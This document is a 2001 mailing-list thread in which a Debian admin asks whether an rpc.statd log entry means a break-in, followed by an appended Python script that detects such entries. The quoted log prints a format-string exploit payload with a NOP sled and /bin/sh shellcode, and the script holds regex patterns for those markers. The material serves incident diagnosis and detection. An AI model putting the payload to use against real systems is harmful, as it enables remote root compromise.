
Re: was I cracked? (rpc.statd, new version)



Erm.. I apologize up front if, while skimming this thread, I missed it, but
I didn't see that he HAD tripwire before the questionable event.
Tripwire is only good if you've got it installed and secure on RO media
before you let anyone else on the box. Having just set up tripwire for
this type of thing, and having been cracked before with my tripwire
nonfunctional, I know of what I speak. You really need the good tripwire
DB to compare something to. Tripwire will only tell Lukas that 'yes,
these are nice files, I will compare them to the next ones I see' -
tripwire won't know any better.

Again, this entire message is predicated on the fact that I didn't recall
seeing evidence that Lukas had tripwire installed already.

j

On Wed, Jul 11, 2001 at 07:01:20PM -0400, kath wrote:
> You can check for modified binaries with tripwire.
> 
> If this was a decent hacker or even a script kiddie using a good tool, they
> probably would have purged your logs of all evidence.
> 
> So either:
> 
> a) They are second rate
> or
> b) They didn't get in
> 
> - k
> On Wed, 11 Jul 2001, Lukas Eppler wrote:
> 
> > I have the following entries in /var/log/messages:
> >
> > Jul  9 01:21:03 blue -- MARK --
> > Jul  9 01:21:11 blue
> > Jul  9 01:21:11 blue /sbin/rpc.statd[166]: gethostbyname error for
> >
> ^X<F7><FF><BF>^X<F7><FF><BF>^Y<F7><FF><BF>^Y<F7><FF><BF>^Z<F7><FF><BF>^Z<F7>
> <FF><BF>^[<F7><FF><BF>^[<F7><FF><BF>%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%
> n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
> 20\220\220\220\220\220\220\220\220\220\220\220
> > Jul  9 01:21:11 blue
> >
> <C7>^F/bin<C7>F^D/shA0<C0>\210F^G\211v^L\215V^P\215N^L\211<F3><B0>^K<CD>\200
> <B0>^A<CD>\200<E8>\177<FF><FF><FF>
> > Jul  9 01:41:03 blue -- MARK --
> >
> > I run debian 2.2, nfs-common is Version: 1:0.1.9.1-1 which has the long known
> > exploit fixed. I can't find modified binaries or any strange behaviour... was
> > this a defeated attack? The second line says /bin/sh somewhere which makes me
> > a bit concerned... Was I cracked?
> >
> > Lukas
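As an added, defender-side example (not written by anyone in this thread), here is a small Python check that scans syslog lines for the rpc.statd "gethostbyname error for" pattern quoted above and flags the markers a hostname never contains: format-string write specifiers, stack-walking reads, a NOP sled and an embedded shell path. The log text inside it is constructed to resemble Lukas's excerpt, with the sled shortened.

```python
import re

# Constructed sample, modelled on the /var/log/messages excerpt in the thread
# (shortened; the real sled was hundreds of \220 bytes).
SAMPLE_LOG = (
    "Jul  9 01:21:03 blue -- MARK --\n"
    "Jul  9 01:21:11 blue /sbin/rpc.statd[166]: gethostbyname error for "
    "^X<F7><FF><BF>%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n"
    + "\\220" * 40 + "<C7>^F/bin<C7>F^D/sh\n"
    "Jul  9 01:41:03 blue -- MARK --\n"
    "Jul  9 02:00:00 blue /sbin/rpc.statd[166]: gethostbyname error for nfsclient\n"
)

STATD_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) "
    r"/sbin/rpc\.statd\[(?P<pid>\d+)\]: gethostbyname error for (?P<arg>.*)$"
)
WRITE_SPEC = re.compile(r"%\d*n")                 # %n writes memory; never part of a hostname
READ_SPEC = re.compile(r"%\d*x")                  # runs of %8x walk the stack
NOP_SLED = re.compile(r"(?:\\220){8,}|\x90{8,}")  # octal-escaped or raw 0x90 run
SHELL_STR = re.compile(r"/bin.{0,8}/sh")          # shell path inside the lookup argument

def classify_statd_line(line):
    """Indicators for one rpc.statd gethostbyname log line; None if it is not such a line."""
    m = STATD_RE.match(line.rstrip("\n"))
    if m is None:
        return None
    arg = m.group("arg")
    rec = {
        "ts": m.group("ts"), "host": m.group("host"), "pid": int(m.group("pid")),
        "format_write": bool(WRITE_SPEC.search(arg)),
        "format_reads": len(READ_SPEC.findall(arg)),
        "nop_sled": bool(NOP_SLED.search(arg)),
        "shell_string": bool(SHELL_STR.search(arg)),
    }
    # A legitimate argument is a hostname, so any one of these markers is enough to alert.
    rec["suspicious"] = (rec["format_write"] or rec["nop_sled"]
                         or rec["shell_string"] or rec["format_reads"] >= 4)
    return rec

def scan_log(text):
    """Records for every rpc.statd gethostbyname line in the log text, in order."""
    return [r for r in map(classify_statd_line, text.splitlines()) if r is not None]

def suspicious_events(text):
    return [r for r in scan_log(text) if r["suspicious"]]

if __name__ == "__main__":
    for r in suspicious_events(SAMPLE_LOG):
        print(f"{r['ts']} {r['host']} rpc.statd[{r['pid']}]: exploit markers in lookup argument")
```

A hit tells you an attempt was logged, not whether it succeeded; as the thread says, only a trusted pre-incident baseline of the binaries can answer that.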


